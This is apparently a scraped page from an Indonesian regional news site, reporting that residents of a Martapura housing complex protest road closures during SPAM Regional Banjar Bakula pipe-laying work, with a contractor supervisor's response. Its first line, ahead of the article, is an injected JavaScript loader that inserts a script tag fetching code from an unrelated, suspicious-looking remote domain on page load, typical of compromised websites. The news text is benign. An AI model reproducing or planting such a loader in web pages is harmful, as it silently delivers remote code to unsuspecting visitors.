(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Warga Komplek Setia Damai Protes Jalan Ditutup


MARTAPURA, Warga komplek Setia Damai, Kecamatan Martapura mengaku terganggu dengan adanya pengerjaan penanaman pipa SPAM Regional Banjar Bakula yang dikerjakan sebuah BUMN.

Warga Komplek Setia Damai Hendra mengatakan, keberadaan alat berat yang menghalangi jalan dekat rumahnya sangat mengganggu rutinitas warga sekitar. Pasalnya dari pihak perusahaan pengerjaan tersebut tidak memberikan akses jalan memadai. Disediakan, hanya bisa dilewati oleh roda dua, sementara kendaraan roda empat tidak bisa melintas.

“Semua warga mengeluh,  pertama jalan rusak, tidak bisa dilalui, sementara akses jalan untuk warga memutar dari komplek Setia Damai, yang jadi masalah jalan penghubung dari komplek kita ke jalan Perjuangan atau jalan utama tidak dibuatkan. Ada namun hanya bisa dilewati roda dua,” ujar Hendra.

Hendra juga menambahkan, pihak warga telah menemui petugas proyek itu untuk mempertanyakan apakah telah dipikirkan untuk akses warga selama proyek berlangsung,  namun bukan jawaban yang mengenakan didapatkannya,  malah petugas proyek menjawabnya dengan nada tinggi dan terkesan arogan.

“Tadi kami sudah menanyakan ke pihak proyek, apakah ini sudah dipikirkan untuk akses warga,  karena akses kami cuma itu satu-satunya,  tapi mereka malah menjawab dengan nada tinggi, bahwa tidak akan ada akses untuk warga, pokoknya selama pengerjaan misalkan seminggu maka jalan harus ditutup selama satu minggu,” ungkapnya.

Foto : hendera

Menurut Hendra dari hasil pertemuan singkat dengan pihak petugas proyek, masyarakat memberikan solusi. Mengingat luasnya lahan yang di miliki irigasi agar bisa di manfaatkan untuk di jadikan jalan alternatif selama proyek berlangsung.

“Lahan milik irigasi masih luas,  kenapa tidak dimanfaatkan buat jalan alternatif,  jadi tidak harus di putar-putar tidak karuan,” ujarnya.

Sementara itu, Santoso pengawas dari PT Adhi Karya proyek pengerjaan penanaman pipa air bersih SPAM Regional Banjar Bakula mengatakan, pihaknya mengaku berterima kasih kepada warga karena telah memberikan solusi, namun dia tidak memungkiri bahwa nanti akan ada penutupan akses secara penuh untuk kelancaran pengerjaan.

“Soal proyek ini, kita tidak akan menutup akses warga, namun kami meminta pengertiannya, karena proyek ini nanti pasti akan ada penutupan akses secara penuh, untuk kelancaran pengerjaan. Tapi tidak lama,” ujar Santoso.

Terkait protes warga karena tidak ada jalan alternatif untuk aksea warga, Santoso mengaku menerima semua masukan dan akan mempertimbangkan.

“Kita berterima kasih karena warga telah memberikan solusi kepada kita dan kita akan mempertimbangkannya,” pungkasnya. (hendera) 

Reporter : Hendera
Editor : Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

280 Jemaah Haji HSU Dilepas Menuju Asrama Haji

KANALKALIMANTAN.COM, AMUNTAI - Lambaian tangan menyertai keberangkatan 280 jemaah haji Kabupaten Hulu Sungai Utara (HSU)… Read More

21 menit ago

Selewengkan Dana Hibah Kubah, Warga Lampihong Dituntut 15 Bulan Penjara

KANALKALIMANTAN.COM, BANJARMASIN - Jaksa Penuntut Umum (JPU) Kejaksaan Negeri (Kejari) Balangan menyatakan Arbainsyah, terdakwa kasus… Read More

31 menit ago

Garuda Semrawut, Kemenag Geram Penerbangan Haji Delay 17 Jam

KANALKALIMANTAN.COM, JAKARTA - Kementerian Agama (Kemenag) geram dengan cara yang diambil manajemen Garuda Indonesia terkait… Read More

1 jam ago

Temu Kangen Reuni Akbar Alumni SMPN 1 dan SMAN 1 Mandomai

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi hadiri temu kangen reuni akbar… Read More

2 jam ago

Tugu Adipura Banjarbaru Layak Dipasang APILL, Tunggu Rekomendasi Resmi BPTD dan BPJN

KANALKALIMANTAN.COM, BANJARBARU - Ruas kawasan Tugu Adipura di Jalan Ahmad Yani Kota Banjarbaru, Kalimantan Selatan… Read More

15 jam ago

Kumpulkan Caleg Terpilih dan Pengurus DPD, PAN Kalsel ‘Panaskan Mesin’ Hadapi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Pasca pelaksanaan Pemilu 2024, Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN)… Read More

17 jam ago

This website uses cookies.